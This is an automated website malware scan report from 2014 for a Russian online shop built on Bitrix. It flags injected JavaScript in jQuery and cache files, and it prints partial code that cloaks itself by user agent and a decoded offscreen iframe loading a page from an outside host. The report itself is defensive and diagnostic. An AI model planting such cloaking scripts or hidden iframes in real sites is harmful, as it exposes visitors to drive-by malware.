New scan:

Malware Scanner report for somresurs.ru

Malicious/Suspicious/Total urls checked
3/1/20
4 pages have malicious or suspicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://somresurs.ru/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:33 GMT
Location: http://www.somresurs.ru/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/
200 OK
Content-Length: 65411
Content-Type: text/html
clean
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_main/kernel_main.js?1385123422307042
200 OK
Content-Length: 303537
Content-Type: application/javascript
clean
http://somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:36 GMT
Location: http://www.somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 367
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/bitrix/js/main/jquery/jquery-1.8.3.min.js?138512100795119
200 OK
Content-Length: 95119
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh';
denygros
... 3290 bytes are skipped ...
eHeader:function(e){var n;if(E===2){if(!s){s={};while(n=pn.exec(i))s[n[1].toLowerCase()]=n[2]}n=s[e.toLowerCase()]}return n===t?null:n},overrideMimeType:function(e){return E||(c.mimeType=e),this},abort:function(e){return e=e||S,o&&o.abort(e),T(0,e),this}};d.promise(x),x.success=x.done,x.error=x.fail,x.complete=m.add,x.statusCode=function(e){if(e){var t;if(E<2)for(t in e)g[t]=[g[t],e[t]];else t=e[x.status],x.always(t)}return this},c.url=((e||c.url)+"").replace(hn,"").replace(mn,ln[1]+"

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
DrWeb
JS.IFrame.566
Fortinet
JS/IFrame.XX!tr
Avira
HTML/Rce.Gen
AVG
HTML/Framer
Sophos
Troj/JSRedir-LH

http://somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:36 GMT
Location: http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 401
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/kernel_socialservices/kernel_socialservices.js?13851213722999
200 OK
Content-Length: 2999
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;
;
(function(){
function stripos (f_haystack, f_needle, f_offset) {
var haystack = (f_haystack + '').toLowerCase();
var needle = (f_needle + '').toLowerCase();
var index = 0;
if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
return index;
}
return false;
}
function braborossa(){
var denygros = 'Chrome|iPad|YandexBot|Firefox/24.0|Googlebot|YandexAntivirus|iPhone|Android|Firefox/12.0|Firefox/17.0|Firefox/25.0|Chromium|Linux|Macintosh'
... 2238 bytes are skipped ...
thWnd = false;
function BxShowAuthFloat(id, suffix)
{
var bCreated = false;
if(!bxAuthWnd)
{
bxAuthWnd = new BX.CDialog({
'content':'<div id="bx_auth_float_container"></div>',
'width': 640,
'height': 400,
'resizable': false
});
bCreated = true;
}
bxAuthWnd.Show();
if(bCreated)
BX('bx_auth_float_container').appendChild(BX('bx_auth_float'));

BxShowAuthService(id, suffix);
}
;

Decoded script:


<iframe src=http://jaxworks.ru/ghj5.u35hh55hj?7 style="position:absolute;left:-1000px;top:-1000px;" height="115" width="115"></iframe>

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
McAfee-GW-Edition
JS/Iframe.gen.ae
Fortinet
JS/IFrame.XX!tr
McAfee
JS/Iframe.gen.ae
AVG
HTML/Framer
Sophos
Troj/JSRedir-LH

http://somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:36 GMT
Location: http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 476
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/bitrix/cache/js/s1/eshop_blue/template_7a01a39f610e3ea0a1f64041268b32ec/template_7a01a39f610e3ea0a1f64041268b32ec_9b40a1bb3aacfbfa919e37545536ef2e.js?1385121372106607
200 OK
Content-Length: 106607
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

$(".tabsblock > .tabs > a").live('click', function() {
var ind = $(this).index();
ind++;
if ($(this).hasClass("active")){} else
{
$(this).parents('.tabsblock').find('.active').removeClass('active')
$(this).addClass('active');
$(".tabsblock").find(".cnt:nth-child("+ind+")").addClass('active');
}
return false;
});
$("#notify_auth_form > .social > form > ul > li > a").live('click', function() {
setTimeout(function()
... 3516 bytes are skipped ...
.body.appendChild(document.createElement("DIV"));
this.WAIT.style.backgroundImage = "url('" + this.arParams.WAIT_IMAGE + "')";
if(!BX.browser.IsIE())
this.WAIT.style.backgroundRepeat = 'none';
this.WAIT.style.display = 'none';
this.WAIT.style.position = 'absolute';
this.WAIT.style.zIndex = '1100';
}
setTimeout(this.onTimeout, 500);
}
BX.ready(function (){_this.Init(arParams)});
}
;;
;
;
;
;
;
;

Antivirus reports:

Avast
JS:Iframe-EHG [Trj]
Avira
HTML/Rce.Gen
AVG
HTML/Framer

http://somresurs.ru/about/how_to_order/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:37 GMT
Location: http://www.somresurs.ru/about/how_to_order/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 329
Content-Type: text/html; charset=iso-8859-1
clean
http://www.somresurs.ru/about/how_to_order/
200 OK
Content-Length: 45518
Content-Type: text/html
clean
http://www.somresurs.ru/about/delivery/
200 OK
Content-Length: 45077
Content-Type: text/html
clean
http://www.somresurs.ru/about/vacancy/
200 OK
Content-Length: 45391
Content-Type: text/html
clean
http://www.somresurs.ru/about/price/
200 OK
Content-Length: 140092
Content-Type: text/html
clean
http://www.somresurs.ru/about/contacts/
200 OK
Content-Length: 46045
Content-Type: text/html
clean
http://www.somresurs.ru//api-maps.yandex.ru/services/constructor/1.0/js/?sid=w0m3YAtXPDJ7nhOcEz2BI9rjn0qCkOGc&width=600&height=450/
404 Not Found
Content-Length: 41450
Content-Type: text/html
clean
http://www.somresurs.ru/login/?backurl=%2Fapi-maps.yandex.ru%2Fservices%2Fconstructor%2F1.0%2Fjs%2F%3Fsid%3Dw0m3YAtXPDJ7nhOcEz2BI9rjn0qCkOGc%26width%3D600%26height%3D450%252F
200 OK
Content-Length: 50538
Content-Type: text/html
clean
http://www.somresurs.ru/login/?backurl=%2Flogin%2F
200 OK
Content-Length: 49422
Content-Type: text/html
clean
http://www.somresurs.ru/login/?register=yes&backurl=%2Flogin%2F
200 OK
Content-Length: 46896
Content-Type: text/html
suspicious
Suspicious code found

<form method="post" action="/login/?register=yes&amp;backurl=%2Flogin%2F" name="bform">
<input type="hidden" name="backurl" value="/login/?backurl=%2Flogin%2F" />
<input type="hidden" name="AUTH_FORM" value="Y" />
<input type="hidden" name="TYPE" value="REGISTRATION" />
Èìÿ<br>
<input type="text" name="USER_NAME" maxlength="50" value="" /><br/><br/>
Ôàìèëèÿ<br>
<input type="text"
... 1082 bytes are skipped ...
br>
<input type="text" name="captcha_word" maxlength="50" value="" />
<p style="clear: left;"><input type="hidden" name="captcha_sid" value="01468dcf3071f386fc33eab6f4d0ca61" />
<img src="/bitrix/tools/captcha.php?captcha_sid=01468dcf3071f386fc33eab6f4d0ca61" width="180" height="40" alt="CAPTCHA" /></p>
<input type="submit" class="bt3" style="width:100%;" name="Register" value="Çàðåãèñòðèðîâàòüñÿ" />
</form>

http://www.somresurs.ru/personal/cart/
200 OK
Content-Length: 45307
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: somresurs.ru

Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 29 Sep 2014 17:04:33 GMT
Location: http://www.somresurs.ru/
Server: Apache/2.2.22 (Debian)
Vary: Accept-Encoding
Content-Length: 310
Content-Type: text/html; charset=iso-8859-1

...310 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: somresurs.ru
Referer: http://www.google.com/search?q=somresurs.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=somresurs.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://somresurs.ru/

Result: somresurs.ru is not infected or malware details are not published yet.